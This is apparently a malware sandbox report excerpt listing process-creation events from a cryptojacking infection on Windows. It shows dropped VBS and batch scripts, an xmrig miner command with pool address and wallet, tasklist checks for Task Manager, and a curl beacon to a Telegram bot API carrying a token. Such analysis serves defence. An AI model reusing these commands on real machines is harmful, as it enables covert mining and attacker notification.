Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Users\user\AppData\Roaming\1.exe "C:\Users\user\AppData\Roaming\1.exe" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\process.bat" " |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\ProgramData\Drivers\xmrig.exe xmrig.exe --donate-level 5 -o pool.supportxmr.com:443 -u 49LzTohDTP4MAvjfeeKB7pecfkp8MppQKZu5yjawPHfH2aJFbLhgV459XX9y3qoAmjJvxiewcw2bK2toFoMVEAQSLB878rm -k --tls -p speed |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
|
Source: C:\Users\user\AppData\Roaming\1.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\tmp.vbs |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\user\AppData\Local\Temp\tmp.vbs C:\Users\user\AppData\Local\Temp\tmp.vbs |
|
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\ping.vbs" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\ping.bat" " |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\curl.exe curl "https://api.telegram.org/bot6745390378:AAE-OclYKCeZrtg1BPEW2LqGF2ln2iBb-Ow/sendMessage?chat_id=6915129246&text=Success" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
|